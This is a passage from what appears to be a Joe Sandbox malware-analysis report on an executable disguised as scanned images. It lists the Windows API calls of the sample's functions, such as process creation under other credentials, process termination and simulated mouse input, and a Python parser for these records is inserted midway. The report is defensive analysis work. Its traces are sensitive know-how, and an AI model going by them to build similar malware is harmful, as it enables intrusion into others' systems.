                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                        • String ID:
                                                        • API String ID: 1827037458-0
                                                        • Opcode ID: fd51865bf56028152fca8cb46d845760570c0302667022961b0c220585608c3b
                                                        • Instruction ID: 19f0046c9445ab4e674bb976cfc3a350f34ce2cce849433e6380c427f897f2a7
                                                        • Opcode Fuzzy Hash: fd51865bf56028152fca8cb46d845760570c0302667022961b0c220585608c3b
                                                        • Instruction Fuzzy Hash: E541BC70100251AFD710DFA8D8C4BBA7BF9FB6A764F140638FA948A2A1C7309806DB61
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00A95134,?,?,00000000,00000001), ref: 00A973BF
                                                          • Part of subcall function 00A93C94: GetWindowRect.USER32(?,?), ref: 00A93CA7
                                                        • GetDesktopWindow.USER32 ref: 00A973E9
                                                        • GetWindowRect.USER32(00000000), ref: 00A973F0
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00A97422
                                                          • Part of subcall function 00A854E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A8555E
                                                        • GetCursorPos.USER32(?), ref: 00A9744E
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A974AC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: 8f380957c9c9cc3c69a2277a0b453e847a6511c0b0b088d76595a2d436e104bd
                                                        • Instruction ID: a001263128a9e21f369bf5bd0fb91dc794ed17830ef47a9e9acc86ede0b77130
                                                        • Opcode Fuzzy Hash: 8f380957c9c9cc3c69a2277a0b453e847a6511c0b0b088d76595a2d436e104bd
                                                        • Instruction Fuzzy Hash: 3031C372608316AFDB24DF94D849E5BBBE9FB89314F000919F58997191DB30E9098B92
                                                        APIs
                                                          • Part of subcall function 00A785F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A78608
                                                          • Part of subcall function 00A785F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A78612
                                                          • Part of subcall function 00A785F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A78621
                                                          • Part of subcall function 00A785F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A78628
                                                          • Part of subcall function 00A785F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A7863E
                                                        • GetLengthSid.ADVAPI32(?,00000000,00A78977), ref: 00A78DAC
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A78DB8
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A78DBF
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A78DD8
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00A78977), ref: 00A78DEC
                                                        • HeapFree.KERNEL32(00000000), ref: 00A78DF3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: 293fb243b1781449df11f46f6cc997fca84341a27b19bd4b59970022163bf27f
                                                        • Instruction ID: 6f8fe92ca74acfcb2b646ebdd2e0242bf6ae0579aa457c9968c9a8e8160f032c
                                                        • Opcode Fuzzy Hash: 293fb243b1781449df11f46f6cc997fca84341a27b19bd4b59970022163bf27f
                                                        • Instruction Fuzzy Hash: 9811CA31641606EFDB24CBA4CC0CBAE7BA9EB42316F10C129E84993291DB3A9901CB60
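The function records on this page (an APIs list, a Memory Dump Source block and a Similarity block per function) are regular enough to parse, which is how a practitioner would pivot from the report to questions such as "which functions call TerminateProcess or CreateProcessWithLogonW" or would rebase the call-site addresses to dump offsets for comparison with a local disassembly. The parser below is an added example and is not Joe Sandbox or IDA-plugin code; the record layout and the embedded sample record are copied from this page (the record ending at 00A78DF3, with the extra Associated dumps and the IDA-plugin lines trimmed). Reading "API String ID" as two dash-separated hashes, one over the API set and one over the string set with 0 when there are no strings, is an assumption drawn from the values shown here.

```python
"""Parse the per-function records of a Joe Sandbox execution-graph report."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Sample input: one record copied from this report (calls at 00A78DAC..00A78DF3);
# the remaining Associated dumps and the IDA-plugin lines are trimmed for brevity.
SAMPLE = """\
APIs
  • Part of subcall function 00A785F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A78608
  • Part of subcall function 00A785F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A78612
  • Part of subcall function 00A785F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A78621
  • Part of subcall function 00A785F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A78628
  • Part of subcall function 00A785F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A7863E
• GetLengthSid.ADVAPI32(?,00000000,00A78977), ref: 00A78DAC
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A78DB8
• HeapAlloc.KERNEL32(00000000), ref: 00A78DBF
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00A78DD8
• GetProcessHeap.KERNEL32(00000000,00000000,00A78977), ref: 00A78DEC
• HeapFree.KERNEL32(00000000), ref: 00A78DF3
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: 293fb243b1781449df11f46f6cc997fca84341a27b19bd4b59970022163bf27f
• Instruction ID: 6f8fe92ca74acfcb2b646ebdd2e0242bf6ae0579aa457c9968c9a8e8160f032c
• Opcode Fuzzy Hash: 293fb243b1781449df11f46f6cc997fca84341a27b19bd4b59970022163bf27f
• Instruction Fuzzy Hash: 9811CA31641606EFDB24CBA4CC0CBAE7BA9EB42316F10C129E84993291DB3A9901CB60
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
CALL_RE = re.compile(  # "<API>.<MODULE>(<args>), ref: <addr>"; args and subcall prefix optional
    r"^•?\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})\s*$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list                          # None where the report shows '?'
    ref: int                            # call-site address inside the dump
    subcall_of: Optional[int] = None    # address of the callee that issues it

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # Similarity and dump fields, keyed by label

def parse_call(line: str) -> Optional[ApiCall]:
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    raw, parent = m.group("args"), m.group("parent")
    args = [None if t == "?" else int(t, 16) for t in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), int(parent, 16) if parent else None)

def parse_records(text: str) -> list:
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs" or not records:   # a complete record opens with "APIs"
                records.append(FunctionRecord())
            section = line
        elif line.startswith("•"):
            if not records:                     # tolerate a truncated leading record
                records.append(FunctionRecord())
            rec = records[-1]
            call = parse_call(line) if section == "APIs" else None
            if call:
                rec.calls.append(call)
            elif (f := FIELD_RE.match(line)):
                key, value = f.group("key").strip(), f.group("value").strip()
                if key == "Associated":         # one line per associated dump
                    rec.meta.setdefault(key, []).append(value)
                else:
                    rec.meta[key] = value
    return records

def direct_calls(rec: FunctionRecord) -> list:
    return [c for c in rec.calls if c.subcall_of is None]

def api_string_id(rec: FunctionRecord) -> tuple:
    """Assumed layout: '<api-set hash>-<string-set hash>', 0 when the function has no strings."""
    a, s = rec.meta["API String ID"].split("-")
    return int(a), int(s)

def opcode_hash_consistent(rec: FunctionRecord) -> bool:
    return rec.meta.get("Opcode ID") == rec.meta.get("Opcode Fuzzy Hash")

def rva(rec: FunctionRecord, call: ApiCall) -> Optional[int]:
    """Call-site offset from the dump's load base ('Offset:' field), or None without one."""
    m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rec.meta.get("Source File", ""))
    return call.ref - int(m.group(1), 16) if m else None
```

Feed the whole report text to parse_records and filter on `call.api` to find the functions of interest; subcall lines keep the parent callee's address in `subcall_of`, so a query can distinguish a direct call from one inherited through a helper. On every record in this section the Opcode ID equals the Opcode Fuzzy Hash, which opcode_hash_consistent lets you confirm rather than assume.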
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A78B2A
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A78B31
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A78B40
                                                        • CloseHandle.KERNEL32(00000004), ref: 00A78B4B
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A78B7A
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00A78B8E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 65b9c1558656f112d37cd4872ca1a9ceb8f90a031d4633218bb17c39d2e4d410
                                                        • Instruction ID: 5c9f5787d9dc0f6234ab477502ea569d6e7914f792078b7a2948ec6862f90170
                                                        • Opcode Fuzzy Hash: 65b9c1558656f112d37cd4872ca1a9ceb8f90a031d4633218bb17c39d2e4d410
                                                        • Instruction Fuzzy Hash: 14115CB254020AAFDF01CFE4DD49FDE7BA9EF49304F048064FE04A21A0C7758D619B60
                                                        APIs
                                                          • Part of subcall function 00A212F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A2134D
                                                          • Part of subcall function 00A212F3: SelectObject.GDI32(?,00000000), ref: 00A2135C
                                                          • Part of subcall function 00A212F3: BeginPath.GDI32(?), ref: 00A21373
                                                          • Part of subcall function 00A212F3: SelectObject.GDI32(?,00000000), ref: 00A2139C
                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00AAC1C4
                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00AAC1D8
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AAC1E6
                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00AAC1F6
                                                        • EndPath.GDI32(00000000), ref: 00AAC206
                                                        • StrokePath.GDI32(00000000), ref: 00AAC216
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                        • String ID:
                                                        • API String ID: 43455801-0
                                                        • Opcode ID: a590e75cae5d44c9e3f6e2a9bea8f9bba5535e6cd78c36f8e286cc9fc9e5579f
                                                        • Instruction ID: 3a0203d87d898d64702ccb27526591e056a6b0a08744524b735923583908ee39
                                                        • Opcode Fuzzy Hash: a590e75cae5d44c9e3f6e2a9bea8f9bba5535e6cd78c36f8e286cc9fc9e5579f
                                                        • Instruction Fuzzy Hash: B911097640014DBFEB129FD4DC88FEA7FADEB093A4F048021BA194A1A1D7719D56DBA0
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A403D3
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A403DB
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A403E6
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A403F1
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A403F9
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A40401
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: 83d3bcad8738f2f963e9c0f0c761d43cf7e44be4156ef301ec6298df7cb3d4eb
                                                        • Instruction ID: 9e3c9ee9f7a9c8a842ccec6d637d4ffe601287b323d9ce60585990e3b01447a2
                                                        • Opcode Fuzzy Hash: 83d3bcad8738f2f963e9c0f0c761d43cf7e44be4156ef301ec6298df7cb3d4eb
                                                        • Instruction Fuzzy Hash: 8E016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A8569B
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A856B1
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00A856C0
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A856CF
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A856D9
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A856E0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: e2f70b9533acd42c57d147877176de8386740292be388a8cd83c677e2752d1c2
                                                        • Instruction ID: 4833f7e15817e8d3bcb9463f80867da37e50a071231ff5de0a16fc713a310eb8
                                                        • Opcode Fuzzy Hash: e2f70b9533acd42c57d147877176de8386740292be388a8cd83c677e2752d1c2
                                                        • Instruction Fuzzy Hash: AEF01D3264115ABFE7259BE2DC0DEAB7A7CEBC7B11F000169FA04D109097A11A0286B5
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00A874E5
                                                        • EnterCriticalSection.KERNEL32(?,?,00A31044,?,?), ref: 00A874F6
                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00A31044,?,?), ref: 00A87503
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A31044,?,?), ref: 00A87510
                                                          • Part of subcall function 00A86ED7: CloseHandle.KERNEL32(00000000,?,00A8751D,?,00A31044,?,?), ref: 00A86EE1
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A87523
                                                        • LeaveCriticalSection.KERNEL32(?,?,00A31044,?,?), ref: 00A8752A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 71851886655120ac6c7b4e33be6e887b14fe8a89b5e8bff7c89e6ffe5935f0e1
                                                        • Instruction ID: fb77c6d891e0f26b53256db65f89c6e192c1428211c0f1ebe46fe6aee93b5bd2
                                                        • Opcode Fuzzy Hash: 71851886655120ac6c7b4e33be6e887b14fe8a89b5e8bff7c89e6ffe5935f0e1
                                                        • Instruction Fuzzy Hash: 94F03A7A140613AFEB696BE4ED88AEA7B2AEF46702B100531F202910E0DB755806CB50
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A78E7F
                                                        • UnloadUserProfile.USERENV(?,?), ref: 00A78E8B
                                                        • CloseHandle.KERNEL32(?), ref: 00A78E94
                                                        • CloseHandle.KERNEL32(?), ref: 00A78E9C
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00A78EA5
                                                        • HeapFree.KERNEL32(00000000), ref: 00A78EAC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 8951ec6df0f928ae5ac0c19e5569454735a49214b20ee581273cba342920c2e3
                                                        • Instruction ID: af6b3ab083cc6597be4fb850fc8f5f6c92af047f1ad9212285289c35dc5c82fe
                                                        • Opcode Fuzzy Hash: 8951ec6df0f928ae5ac0c19e5569454735a49214b20ee581273cba342920c2e3
                                                        • Instruction Fuzzy Hash: 9BE0C236104002FFDB059FE1EC0C90ABB69FB8A322B108234F329850B0CB329422DB60
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A98928
                                                        • CharUpperBuffW.USER32(?,?), ref: 00A98A37
                                                        • VariantClear.OLEAUT32(?), ref: 00A98BAF
                                                          • Part of subcall function 00A87804: VariantInit.OLEAUT32(00000000), ref: 00A87844
                                                          • Part of subcall function 00A87804: VariantCopy.OLEAUT32(00000000,?), ref: 00A8784D
                                                          • Part of subcall function 00A87804: VariantClear.OLEAUT32(00000000), ref: 00A87859
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: 7659085695ea148f279a91fbb5cc31a2514868c841402ee81b15a6f89888339d
                                                        • Instruction ID: d587588abcc54b7f705e41d827d91bc9e451ba07b0fdf6afd2dab3a8ccf4ab96
                                                        • Opcode Fuzzy Hash: 7659085695ea148f279a91fbb5cc31a2514868c841402ee81b15a6f89888339d
                                                        • Instruction Fuzzy Hash: C7918B716083019FCB10DF28C58596BBBF4EF8A754F04896EF89A8B361DB31E945CB52
                                                        APIs
                                                          • Part of subcall function 00A3FEC6: _wcscpy.LIBCMT ref: 00A3FEE9
                                                        • _memset.LIBCMT ref: 00A83077
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A830A6
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A83159
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A83187
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: 29d5b1153490aa01c88f298d0d25e66fbdfa6933d4f90642e24229bb7a2538a1
                                                        • Instruction ID: d44a61ca96c2df5a061f61ac096d765c1c56bae56738cae876f76417e81989ef
                                                        • Opcode Fuzzy Hash: 29d5b1153490aa01c88f298d0d25e66fbdfa6933d4f90642e24229bb7a2538a1
                                                        • Instruction Fuzzy Hash: EA51BE326083019ADF25FF28D949A6BBBE4EF95F60F044A2DF885D7191DB70CE448792
                                                        APIs
                                                        • GetWindowRect.USER32(0177F430,?), ref: 00AA9AD2
                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00AA9B05
                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00AA9B72
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID: @U=u
                                                        • API String ID: 3880355969-2594219639
                                                        • Opcode ID: 0168a9cdb5a32841f09949ce78c9189439290d986ec4df59cab6720c64372672
                                                        • Instruction ID: 8c8a0dfed020e062d7703b1e38b500a864999de8a602de384638c69082386dcf
                                                        • Opcode Fuzzy Hash: 0168a9cdb5a32841f09949ce78c9189439290d986ec4df59cab6720c64372672
                                                        • Instruction Fuzzy Hash: CB510E34A00249EFCF14DF58D9819AE7BB6FF56360F14856AF9159B2E0D730AD41CBA0
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A7DAC5
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A7DAFB
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A7DB0C
